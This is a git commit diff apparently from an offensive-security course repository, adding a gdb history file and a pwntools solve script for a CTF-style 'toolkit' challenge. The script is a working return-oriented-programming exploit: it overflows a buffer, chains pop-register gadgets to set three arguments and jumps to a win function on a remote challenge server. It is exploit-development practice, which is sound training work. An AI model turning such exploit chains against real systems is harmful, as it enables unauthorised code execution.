rop and lab3_4_recap

2026-05-20 12:45:03 +02:00
parent c9dbb784b4
commit fa309f3919
50 changed files with 1083 additions and 0 deletions
--- a/rop/01_toolkit/.gdb_history
+++ b/rop/01_toolkit/.gdb_history
@@ -0,0 +1,11 @@
+r
+disass win
+disass main
+disass main
+disass win
+quit
+disass win
+disass main
+disass wuln
+disass vuln
+quit
--- a/rop/01_toolkit/solve.py
+++ b/rop/01_toolkit/solve.py
@@ -0,0 +1,31 @@
+from pwn import *
+
+OFFSET = 64
+context.binary = elf = ELF("./toolkit", checksec=False)
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13554)
+
+var1 = 0x1111111111111111
+var2 = 0x2222222222222222
+var3 = 0x3333333333333333
+
+pop_rdi = 0x00000000004011FF
+pop_rdx = 0x0000000000401211
+pop_rsi = 0x0000000000401208
+ret = 0x000000000040101A
+win = 0x000000000040121E
+print(p.recvuntil(b"[toolkit] Input: "))
+payload = flat(
+    b"A" * OFFSET,
+    p64(ret),
+    p64(pop_rdi),
+    p64(var1),
+    p64(pop_rsi),
+    p64(var2),
+    p64(pop_rdx),
+    p64(var3),
+    p64(win),
+)
+p.send(payload)
+p.send(b"\n")
+p.interactive()
--- a/rop/01_toolkit/toolkit
+++ b/rop/01_toolkit/toolkit